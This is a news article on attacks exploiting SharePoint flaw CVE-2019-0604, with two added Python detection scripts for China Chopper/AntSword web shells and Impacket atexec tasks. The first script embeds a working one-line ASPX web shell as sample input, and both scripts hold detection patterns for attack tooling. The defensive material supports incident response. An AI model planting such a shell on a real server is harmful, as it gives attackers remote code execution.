Dark Reading is part of the Informa Tech Division of Informa PLC


Cloud

2/4/2020
06:10 PM

SharePoint Bug Proves Popular Weapon for Nation-State Attacks

Thousands of servers could be exposed to SharePoint vulnerability CVE-2019-0604, recently used in cyberattacks against Middle East government targets.

Researchers have detected multiple instances of cyberattackers using SharePoint vulnerability CVE-2019-0604 to target government organizations in the Middle East. These mark the latest cases of adversaries exploiting the flaw, which was recently used to breach the United Nations.

CVE-2019-0604 is a remote code execution flaw that exists because SharePoint fails to check the source markup of an application package. An attacker exploits it by uploading a specially crafted SharePoint application package to an affected version of the software; a successful exploit runs arbitrary code in the context of both the SharePoint application pool and the SharePoint server farm account.

Microsoft released a patch for the vulnerability in February 2019 and later updated its fix in April. Shortly after, reports surfaced indicating the remote code execution flaw was under active attack. In a series of incidents, attackers exploited it to drop the China Chopper web shell on SharePoint servers and used that shell as their foothold into several organizations' networks.

New findings from Palo Alto Networks' Unit 42 suggest the vulnerability is still popular among attackers. In September 2019, researchers detected unknown threat actors exploiting the flaw to install several web shells on the website of a Middle East government organization. One of these was AntSword, a web shell freely available on GitHub that resembles China Chopper.
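Both web shells named above are driven the same way: a one-line server-side page that eval()s whatever arrives in a POST parameter, and a client that only ever POSTs to it. The script below is an added example, not Unit 42's tooling or anything from the incidents described; it checks .aspx source for the eval(Request...,"unsafe") one-liner that China Chopper's ASPX payload and AntSword's default ASPX template share, and it parses IIS W3C logs for POST traffic to .aspx pages outside an operator-supplied baseline. The sample shell source, log lines, file names and baseline are constructed for the example.

```python
"""Hunting for China Chopper / AntSword style ASPX web shells on a SharePoint host.

Two checks: (1) scan .aspx source for the one-line eval(Request...,"unsafe")
shell that China Chopper's ASPX payload and AntSword's default ASPX template
share; (2) scan IIS W3C logs for POST requests to .aspx pages outside a
baseline of pages the site legitimately accepts POSTs for. The sample shell
source, log lines and baseline are constructed for this example.
"""
import re
from collections import Counter

# Server-side one-liner: eval() of a request parameter with the "unsafe" flag.
CHOPPER_ASPX = re.compile(
    r'eval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*\[[^\]]*\]\s*,\s*"unsafe"\s*\)',
    re.IGNORECASE,
)


def looks_like_chopper(source: str) -> bool:
    """True if .aspx/.ashx source carries the Chopper/AntSword eval one-liner."""
    return CHOPPER_ASPX.search(source) is not None


def parse_w3c(log_text: str):
    """Yield one dict per entry of an IIS W3C log, keyed by its #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def suspicious_posts(log_text: str, baseline: set, min_hits: int = 1):
    """Return (client ip, uri, hit count) for POSTs to .aspx pages not in baseline.

    A web shell is driven entirely through POST bodies, so a page that only
    receives POSTs, from one client, and is not a page the site is known to
    accept POSTs on is a strong lead. The baseline is the operator's allowlist.
    """
    hits = Counter()
    for entry in parse_w3c(log_text):
        uri = entry.get("cs-uri-stem", "").lower()
        if entry.get("cs-method") != "POST" or not uri.endswith(".aspx"):
            continue
        if uri in baseline:
            continue
        hits[(entry.get("c-ip"), uri)] += 1
    return [(ip, uri, n) for (ip, uri), n in hits.items() if n >= min_hits]


# Constructed sample inputs (not from any real incident).
SAMPLE_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["ant"],"unsafe");%>'
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-09-10 03:12:44 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) 200
2019-09-10 03:13:01 10.0.0.5 POST /_layouts/15/upload.aspx - 443 CORP\\alice 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) 200
2019-09-10 03:15:07 10.0.0.5 POST /_layouts/15/images/stylecss.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible) 200
2019-09-10 03:15:09 10.0.0.5 POST /_layouts/15/images/stylecss.aspx - 443 - 203.0.113.7 Mozilla/5.0+(compatible) 200
"""
BASELINE = {"/_layouts/15/upload.aspx"}

if __name__ == "__main__":
    print("shell source:", looks_like_chopper(SAMPLE_SHELL))
    for ip, uri, n in suspicious_posts(SAMPLE_LOG, BASELINE):
        print(f"{ip} POSTed {n}x to {uri}")
```

The log check is a heuristic, not a signature: operators rename shells freely, so the thing that stays constant is the traffic shape (POST-only, unauthenticated client, a page no legitimate user visits). Run the source check over the whole web root, including LAYOUTS and any virtual directories, not just the site content database.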

Attackers used these web shells to move laterally across the network and reach other systems, explains cyber threat intelligence analyst Robert Falcone in a blog post on the findings. They employed a custom Mimikatz variant to dump credentials from memory and Impacket's atexec tool to run commands on other systems throughout the network with those dumped credentials.
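The atexec step leaves a distinctive trail on every host it touches, because it works through the Task Scheduler service rather than a persistent agent. The detector below is an added example, not Unit 42's or Impacket's code; it follows my reading of Impacket's atexec.py, where the tool registers a task with an eight-letter random name, executes cmd.exe /C <command> with output redirected to %windir%\Temp\<eight letters>.tmp, reads that file over ADMIN$ and deletes the task seconds later. Treat those exact strings as assumptions. It scores Windows Security events 4698 (task created) and 4699 (task deleted); the task definitions and event records are constructed for the example, with field names following the EventData of the real events.

```python
"""Flag scheduled tasks that look like Impacket atexec, from Security events
4698 (task created) and 4699 (task deleted).

The pattern follows my reading of Impacket's atexec.py (an assumption):
an 8-letter random task name, an <Exec> action of cmd.exe /C <command> with
output redirected to %windir%\\Temp\\<8 letters>.tmp 2>&1, and deletion of
the task seconds later once the output has been read over ADMIN$.
The task XML and events below are constructed, not from a real host.
"""
import re
from datetime import datetime, timedelta
from xml.etree import ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
RANDOM_NAME = re.compile(r"^\\?[A-Za-z]{8}$")
TEMP_REDIRECT = re.compile(r">\s*%windir%\\Temp\\[A-Za-z]{8}\.tmp\s+2>&1", re.I)


def exec_actions(task_xml: str):
    """Return (command, arguments) for each <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    return [
        (ex.findtext("t:Command", default="", namespaces=TASK_NS),
         ex.findtext("t:Arguments", default="", namespaces=TASK_NS))
        for ex in root.iterfind(".//t:Actions/t:Exec", TASK_NS)
    ]


def find_atexec(events, delete_window=timedelta(minutes=5)):
    """Score each 4698 on task name, action and quick deletion; return the hits."""
    deletions = {}
    for e in events:
        if e["EventID"] == 4699:
            deletions.setdefault(e["TaskName"], []).append(
                datetime.fromisoformat(e["TimeCreated"]))
    findings = []
    for e in events:
        if e["EventID"] != 4698:
            continue
        name, created = e["TaskName"], datetime.fromisoformat(e["TimeCreated"])
        reasons = []
        if RANDOM_NAME.match(name):
            reasons.append("random-8-letter-name")
        for cmd, args in exec_actions(e["TaskContent"]):
            if cmd.lower().endswith("cmd.exe") and TEMP_REDIRECT.search(args):
                reasons.append("cmd-output-to-temp-tmp")
        if any(created <= d <= created + delete_window for d in deletions.get(name, [])):
            reasons.append("deleted-within-window")
        # The redirect alone is decisive; a random name or quick deletion alone is noisy.
        if "cmd-output-to-temp-tmp" in reasons or len(reasons) >= 2:
            findings.append({"task": name, "user": e["SubjectUserName"],
                             "created": e["TimeCreated"], "reasons": reasons})
    return findings


# Constructed task definitions and events (not from a real host).
ATEXEC_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="LocalSystem"><Exec><Command>cmd.exe</Command>
    <Arguments>/C whoami &gt; %windir%\Temp\kGyTrmQe.tmp 2&gt;&amp;1</Arguments></Exec></Actions>
</Task>"""
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\wbadmin.exe</Command>
    <Arguments>start backup -quiet</Arguments></Exec></Actions>
</Task>"""
EVENTS = [
    {"EventID": 4698, "TimeCreated": "2019-09-11T02:14:05", "SubjectUserName": "svc_backup",
     "TaskName": "\\kGyTrmQe", "TaskContent": ATEXEC_TASK},
    {"EventID": 4699, "TimeCreated": "2019-09-11T02:14:08", "SubjectUserName": "svc_backup",
     "TaskName": "\\kGyTrmQe"},
    {"EventID": 4698, "TimeCreated": "2019-09-11T02:30:00", "SubjectUserName": "admin",
     "TaskName": "\\Microsoft\\Windows\\Backup\\Nightly", "TaskContent": BENIGN_TASK},
]

if __name__ == "__main__":
    for hit in find_atexec(EVENTS):
        print(hit["created"], hit["user"], hit["task"], ", ".join(hit["reasons"]))
```

Event 4698 is only written when "Audit Other Object Access Events" is enabled in the advanced audit policy; without it the only trace is the Task Scheduler operational log, so check that setting before relying on this detection. The SubjectUserName on the hit is the account whose credentials were dumped and reused, which is the lead to chase back to the host where Mimikatz ran.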

Later in September, Unit 42 saw this same Mimikatz variant uploaded to a web shell hosted at another government organization in a second Middle East country. The variant is distinctive, Falcone writes, because it comes with what appears to be a custom loader application written in .NET. On that basis researchers believe the same group is behind the breaches at both government organizations.

This isn't the first time Unit 42 has seen CVE-2019-0604 used against government targets in the Middle East. In April 2019, researchers saw the Emissary Panda threat group exploiting this flaw to install web shells on SharePoint servers at government organizations in two Middle Eastern countries, both different from the nations targeted in the September 2019 attacks. There are no strong ties linking the two sets of attacks aside from a common vulnerability, a similar tool set, and government victims.

Emissary Panda has "extensively used" strategic Web compromises to target victims, Falcone writes in an email to Dark Reading. However, there is not sufficient information to say with confidence where the group operates. It has been active since at least 2010 and has targeted organizations in the government, aerospace, defense, technology, energy, and manufacturing verticals, among other victims, with the goal of infiltrating a network, performing reconnaissance, and pivoting to other systems.

"The exploitation of this vulnerability is not unique to Emissary Panda, as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks," Falcone writes. There is a possibility of overlap in the use of AntSword, as Emissary Panda used China Chopper and the two are "incredibly similar," he explains, but researchers don't currently believe the attackers behind the April 2019 attacks leveraged AntSword.

CVE-2019-0604 was also used in a recent attack against the United Nations in which intruders compromised servers at UN offices in Geneva and Vienna. Attackers accessed Active Directory, likely compromising human resources and network data. It's unclear exactly which files were stolen in the breach; one UN IT official estimates some 400GB of files were downloaded.

"Once the actors are in after successfully exploiting the vulnerability, they can do whatever they want within the constraints of the compromised network," says Falcone of the vulnerability's popularity, noting that a security tool might block or stop an attacker's actions. The flaw is commonly used because it's remotely exploitable pre-authentication, and there is publicly available code. "The public exploit code makes it easier for attackers, because they can just use a tool and gain access," he adds.

In early January 2020, Unit 42 researchers used Shodan to search for Internet-accessible servers running versions of SharePoint affected by CVE-2019-0604. Their search found 28,881 servers advertising a vulnerable version of the software. They did not probe each server to verify its exposure, so it's possible many of these public-facing servers have been patched or are otherwise not exploitable; a version banner alone is not proof of a vulnerable host.

"Regardless, the sheer number of servers and publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector," Falcone writes.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...
